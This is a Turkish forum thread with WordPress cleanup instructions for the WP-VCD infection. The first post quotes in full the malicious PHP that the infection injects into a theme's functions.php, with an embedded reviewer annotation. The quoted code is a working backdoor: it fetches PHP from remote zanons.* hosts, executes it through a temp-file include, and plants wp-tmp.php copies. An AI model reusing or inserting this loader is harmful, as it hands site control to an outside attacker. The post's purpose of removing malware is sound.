• 26-06-2020, 17:01:06
    #1
    Eklentiler aracılığıyla veya doğrudan temalar ile bu virüs, temanın functions.php dosyasına bir kod yazdırıyor. Ardından bu kod sayesinde wp-includes klasörü içerisine wp-tmp.php ve wp-vcd.php isminde dosyalar gönderiyor.
    • Öncelikle functions.php dosyasını bilgisayarınıza indirip açın ve içerisinde bulunan aşağıdaki kodu silin.
    <?php /* NOTE(review): annotation added for readers cleaning an infected site; it is not part of the injected code.
       What the quoted fragment does, as far as the visible text shows:
       - It opens with a check that the request carries `action` and a `password` that loosely equals a hard-coded
         string (shown on this page as a run of X characters).
       - It proceeds only when stripos() for 'wp-cron.php' and 'xmlrpc.php' in REQUEST_URI loosely equals false.
       - It fetches content from hard-coded remote URLs with file_get_contents(), for two of the hosts falling back
         to the cURL helper file_get_contents_tcurl(), and accepts the content only if it contains $wp_auth_key.
       - theme_temp_setup() writes that content to a temp file, include-s it (so the fetched PHP is executed),
         unlinks the temp file and returns get_defined_vars(), which the caller passes to extract().
       - A copy is saved as wp-includes/wp-tmp.php; if that file does not exist afterwards, the theme directory is
         tried, then a relative 'wp-tmp.php'. Later elseif branches load the saved copy from those same three
         locations, so every one of them has to be checked during cleanup.
       - wp-vcd.php is not written by the visible fragment; only the name "wp_vcd" appears in $div_code_name.
       The fragment appears incomplete: the two outermost `if` blocks are not closed in the quoted text. The
       <span class="userTag"> pieces and the "n" after the opening tag inside the fwrite() strings are presumably
       forum/extraction artifacts rather than part of the original code; verify against the file on disk. */ if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'XXXXXXXXXXXXXXXXXXXXXX')) { if ( ! function_exists( 'wp_temp_setup' ) ) { $path=$_SERVER['HTTP_HOST'].$_SERVER[REQUEST_URI]; $div_code_name = "wp_vcd";$funcfile = __FILE__;if(!function_exists('theme_temp_setup')) { $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI]; if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) { function file_get_contents_tcurl($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE); $data = curl_exec($ch); curl_close($ch); return $data; } function theme_temp_setup($phpCode) { $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup"); $handle = fopen($tmpfname, "w+"); if( fwrite($handle, "<?phpn" . $phpCode)) { } else { $tmpfname = tempnam('./', "theme_temp_setup"); $handle = fopen($tmpfname, "w+"); fwrite($handle, "<?phpn" . $phpCode); } fclose($handle); include $tmpfname; unlink($tmpfname); return get_defined_vars(); } $wp_auth_key='08b370e35d008b6591dd40b0eec23025'; if (($tmpcontent = <span class="userTag"><span class="userTag"><span class="userTag">@file_get_contents("</span></span></span>http://www.zanons.com/code.php") OR $tmpcontent = <span class="userTag"><span class="userTag">@file_get_contents_tcurl("</span></span>http://www.zanons.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) { if (stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup($tmpcontent)); <span class="userTag"><span class="userTag">@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);</span></span> if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) { <span class="userTag"><span class="userTag">@file_put_contents(get_template_directory() . 
'/wp-tmp.php', $tmpcontent);</span></span> if (!file_exists(get_template_directory() . '/wp-tmp.php')) { <span class="userTag"><span class="userTag">@file_put_contents('wp-tmp.php', $tmpcontent);</span></span> } } } } elseif ($tmpcontent = <span class="userTag"><span class="userTag"><span class="userTag">@file_get_contents("</span></span></span>http://www.zanons.me/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) {if (stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup($tmpcontent)); <span class="userTag"><span class="userTag">@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);</span></span> if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) { <span class="userTag"><span class="userTag">@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);</span></span> if (!file_exists(get_template_directory() . '/wp-tmp.php')) { <span class="userTag"><span class="userTag">@file_put_contents('wp-tmp.php', $tmpcontent);</span></span> } } } } elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup($tmpcontent)); } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup($tmpcontent)); } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup($tmpcontent)); } elseif (($tmpcontent = <span class="userTag"><span class="userTag"><span class="userTag">@file_get_contents("</span></span></span>http://www.zanons.xyz/code.php") OR $tmpcontent = <span class="userTag"><span class="userTag">@file_get_contents_tcurl("</span></span>http://www.zanons.xyz/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup($tmpcontent)); } }} ?>
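    Ardından /wp-includes/ klasörünüze girin ve wp-tmp.php ve wp-vcd.php isimli iki dosyayı bulup silerseniz sorunu gidermiş olursunuz. Yukarıdaki kod, wp-includes içinde dosya oluşmazsa wp-tmp.php dosyasını tema klasörüne veya çalışma dizinine de bıraktığı için bu konumları da kontrol edin; virüsü getiren eklenti veya tema sitede kaldığı sürece kod functions.php dosyasına yeniden yazılabilir.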
  • 26-06-2020, 17:45:47
    #2
    Yararlı ama etkisi bir yere kadar.